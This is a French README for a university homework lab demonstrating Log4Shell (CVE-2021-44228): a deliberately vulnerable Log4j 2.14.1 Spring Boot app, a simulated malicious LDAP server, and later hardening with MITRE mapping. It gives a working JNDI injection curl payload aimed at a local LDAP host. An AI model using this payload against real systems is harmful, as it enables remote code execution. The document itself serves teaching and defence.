
Démonstration d'exploitation de Log4Shell (CVE-2021-44228) pour SEAS 8405. Comprend une application Spring Boot vulnérable, un faux serveur LDAP, une configuration Docker, un mapping MITRE, une réponse aux incidents et un enregistrement d'écran complet.
Ce projet démontre l'exploitation et l'atténuation de la vulnérabilité Log4Shell (CVE-2021-44228) à l'aide d'une application web Java dockerisée avec Log4j 2.14.1 vulnérable. Le dispositif comprend également un serveur LDAP malveillant simulé pour démontrer le chemin d'attaque par injection JNDI.
Après l'exploitation, le système est durci en mettant à niveau Log4j, en validant les entrées et en appliquant les recommandations de MITRE D3FEND et ATT&CK.
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
L'application sera accessible à l'adresse :
http://localhost:8080
python3 ldap_server.py
Envoyez une requête comme celle-ci à l'application :
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
Le serveur LDAP devrait recevoir la requête (cela simule l'exploit JNDI).
Après avoir démontré l'attaque, le système a été sécurisé en :
${jndi:...})Voir mitigation_report.pdf pour :
Si la vidéo n'est pas téléchargée directement, elle est disponible via le lien dans le rapport.
Serpil Rivas
SEAS 8405 – Architectures de cybersécurité
Mai 2025